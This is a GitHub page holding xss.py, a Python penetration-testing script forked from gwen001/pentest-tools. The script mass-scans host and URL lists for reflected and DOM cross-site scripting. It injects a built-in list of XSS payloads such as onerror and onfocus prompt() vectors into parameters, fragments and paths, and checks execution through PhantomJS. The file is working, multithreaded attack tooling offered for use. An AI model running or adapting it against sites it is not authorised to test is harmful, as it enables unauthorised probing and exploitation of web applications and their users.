forked from gwen001/pentest-tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxss.py
executable file
·347 lines (282 loc) · 9.64 KB
/
xss.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import copy
import base64
import random
import argparse
import subprocess
import urllib.parse
from functools import partial
from threading import Thread
from queue import Queue
from multiprocessing.dummy import Pool
from colored import fg, bg, attr
def banner():
print("""
__ _____ ___ _ __ _ _
\ \/ / __/ __| | '_ \| | | |
> <\__ \__ \ _ | |_) | |_| |
/_/\_\___/___/ (_) | .__/ \__, |
|_| |___/
by @gwendallecoguic
""")
pass
banner()
def rebuiltQuery( t_params ):
query = ''
for pname,t_values in t_params.items():
for k in range(len(t_values)):
query = query + pname+'='+t_values[k] + '&'
return query.strip('&')
def _parse_qs( query ):
t_params = {}
tmptab = query.split('&')
for param in tmptab:
t_param = param.split('=')
pname = t_param[0]
if not pname in t_params:
t_params[pname] = []
pvalue = '' if len(t_param) < 2 else t_param[1]
t_params[pname].append( pvalue )
return t_params
def testParams( t_urlparse, payload ):
# t_params = urllib.parse.parse_qs( t_urlparse.query )
t_params = _parse_qs( t_urlparse.query )
for pname,t_values in t_params.items():
for k in range(len(t_values)):
pvalue = t_values[k]
t_params2 = copy.deepcopy(t_params)
if pvalue == '':
pvalue = 666
new_value = str(pvalue) + payload
t_params2[pname][k] = urllib.parse.quote( new_value )
new_query = rebuiltQuery( t_params2 )
t_urlparse = t_urlparse._replace(query=new_query)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
# convert get params to post
# t_urlparse = t_urlparse._replace(query='')
# url = urllib.parse.urlunparse(t_urlparse)
# doTest( url, 'POST', new_query )
def testFragment( t_urlparse, payload ):
new_value = t_urlparse.fragment + urllib.parse.quote(payload)
t_urlparse = t_urlparse._replace(fragment=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
def testPath( t_urlparse, payload ):
path = ''
t_path = ['/'] + t_urlparse.path.split('/')
for dir in t_path:
if len(dir):
path = path + '/' + dir
path = path.replace('//','/')
# new_value = os.path.dirname(t_urlparse.path) + '/' + urllib.parse.quote(payload)
new_value = path + '/' + urllib.parse.quote(payload)
new_value = new_value.replace('//','/')
t_urlparse = t_urlparse._replace(path=new_value)
url = urllib.parse.urlunparse(t_urlparse)
doTest( url )
def testPayload( url, payload ):
t_urlparse = urllib.parse.urlparse( url )
if len(t_urlparse.query):
testParams( t_urlparse, payload )
if len(t_urlparse.fragment):
testFragment( t_urlparse, payload )
testPath( t_urlparse, payload )
def testURL( url ):
time.sleep( 0.01 )
if _verbose <= 1:
sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
t_multiproc['n_current'] = t_multiproc['n_current'] + 1
pool = Pool( 10 )
pool.map( partial(testPayload,url), t_payloads )
pool.close()
pool.join()
# console.log( 'Usage: phantomjs xss.js <method> <url> [<post_params>] [<cookies> <domain>]');
def doTest( url, method='GET', post_params='' ):
t_urlparse = urllib.parse.urlparse( url )
t_params = [ method, url, post_params, _cookies, t_urlparse.netloc ]
cmd = _phantom_cmd
for param in t_params:
cmd = cmd + ' ' + '"'+base64.b64encode(param.encode()).decode()+'"'
if _verbose >= 3:
print(cmd)
cmd_output = ''
try:
cmd_output = subprocess.check_output( cmd, shell=True ).decode('utf-8')
if _verbose >= 3:
print( cmd_output )
except Exception as e:
if _verbose >= 3:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
# pass
if 'called' in cmd_output:
vuln = 'VULNERABLE'
else:
vuln = '-'
output = "%s\t\tP=%s\t\tV=%s\n" % (url,post_params,vuln)
fp = open( t_multiproc['f_output'], 'a+' )
fp.write( output )
fp.close()
if _verbose >= 2 or (_verbose >= 1 and vuln == 'VULNERABLE'):
if vuln == 'VULNERABLE':
sys.stdout.write( '%s%s%s' % (fg('light_red'),output,attr(0)) )
else:
sys.stdout.write( output )
parser = argparse.ArgumentParser()
parser.add_argument( "-a","--path",help="set paths list" )
parser.add_argument( "-c","--cookies",help="cookies separated by semi-colon, example: cookie1=value1;cookie2=value2..." )
parser.add_argument( "-n","--phantom",help="phantomjs path" )
parser.add_argument( "-o","--hosts",help="set host list (required or -u)" )
parser.add_argument( "-p","--payloads",help="set payloads list" )
parser.add_argument( "-s","--scheme",help="scheme to use, default=http,https" )
parser.add_argument( "-t","--threads",help="threads, default 10" )
parser.add_argument( "-u","--urls",help="set url list (required or -o)" )
parser.add_argument( "-v","--verbose",help="display output, 0=nothing, 1=only vulnerable, 2=all requests, 3=full debug, default: 1" )
parser.parse_args()
args = parser.parse_args()
if args.phantom:
_phantom = args.phantom
else:
_phantom = '/usr/local/bin/phantomjs'
# _phantom = '/usr/local/bin/node'
if not os.path.isfile(_phantom):
parser.error( 'phantomjs not found!' )
_phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/phantom-xss.js'
# _phantom_cmd = _phantom + ' ' + os.path.dirname(os.path.realpath(__file__)) + '/puppeteer-xss.js'
# print( _phantom_cmd )
if args.scheme:
t_scheme = args.scheme.split(',')
else:
t_scheme = ['http','https']
if args.cookies:
_cookies = args.cookies
else:
_cookies = ''
t_hosts = []
if args.hosts:
if os.path.isfile(args.hosts):
fp = open( args.hosts, 'r' )
t_hosts = fp.read().strip().split("\n")
fp.close()
else:
t_hosts.append( args.hosts )
n_hosts = len(t_hosts)
sys.stdout.write( '%s[+] %d hosts found: %s%s\n' % (fg('green'),n_hosts,args.hosts,attr(0)) )
t_urls = []
if args.urls:
if os.path.isfile(args.urls):
fp = open( args.urls, 'r' )
t_urls = fp.read().strip().split("\n")
fp.close()
else:
t_urls.append( args.urls )
n_urls = len(t_urls)
sys.stdout.write( '%s[+] %d urls found: %s%s\n' % (fg('green'),n_urls,args.urls,attr(0)) )
if n_hosts == 0 and n_urls == 0:
parser.error( 'hosts/urls list missing' )
t_path = [ '' ]
if args.path:
if os.path.isfile(args.path):
fp = open( args.path, 'r' )
t_path = fp.read().strip().split("\n")
fp.close()
else:
t_path.append( args.path )
n_path = len(t_path)
sys.stdout.write( '%s[+] %d path found: %s%s\n' % (fg('green'),n_path,args.path,attr(0)) )
if args.payloads:
t_payloads = []
if os.path.isfile(args.payloads):
fp = open( args.payloads, 'r' )
t_payloads = fp.read().strip().split("\n")
fp.close()
else:
t_payloads.append( args.payloads )
n_payloads = len(t_payloads)
sys.stdout.write( '%s[+] %d payloads found: %s%s\n' % (fg('green'),n_payloads,args.payloads,attr(0)) )
else:
n_payloads = 0
if args.verbose:
_verbose = int(args.verbose)
else:
_verbose = 1
if args.threads:
_threads = int(args.threads)
else:
_threads = 10
t_totest = []
t_vulnerable = []
u_max_length = 0
d_output = os.getcwd()+'/xss'
f_output = d_output + '/' + 'output'
if not os.path.isdir(d_output):
try:
os.makedirs( d_output )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
exit()
# source: https://twitter.com/brutelogic/status/1138805808328839170
if not n_payloads:
t_payloads = [
'\'"--><img src=x onerror=prompt(1)>',
'"autofocus onfocus=prompt(1)//',
'\'"--></script><script>prompt(1)</script>',
"'-prompt(1)-'",
"\\'-prompt(1)//",
'javascript:prompt(1)',
]
n_payloads = len(t_payloads)
sys.stdout.write( '%s[+] options are -> threads:%d, payloads:%d%s\n' % (fg('green'),_threads,n_payloads,attr(0)) )
for scheme in t_scheme:
for host in t_hosts:
for path in t_path:
u = scheme + '://' + host.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
for url in t_urls:
for path in t_path:
u = url.strip() + path
t_totest.append( u )
l = len(u)
if l > u_max_length:
u_max_length = l
n_totest = len(t_totest)
sys.stdout.write( '%s[+] %d urls created.%s\n' % (fg('green'),n_totest,attr(0)) )
sys.stdout.write( '[+] testing...\n' )
random.shuffle(t_totest)
# print("\n".join(t_totest))
# exit()
t_exceptions = {}
t_multiproc = {
'n_current': 0,
'n_total': n_totest,
'u_max_length': u_max_length+5,
'd_output': d_output,
'f_output': f_output,
}
# testURL( args.urls)
# exit()
def doWork():
while True:
url = q.get()
testURL( url )
q.task_done()
q = Queue( _threads*2 )
for i in range(_threads):
t = Thread( target=doWork )
t.daemon = True
t.start()
try:
for url in t_totest:
q.put( url )
q.join()
except KeyboardInterrupt:
sys.exit(1)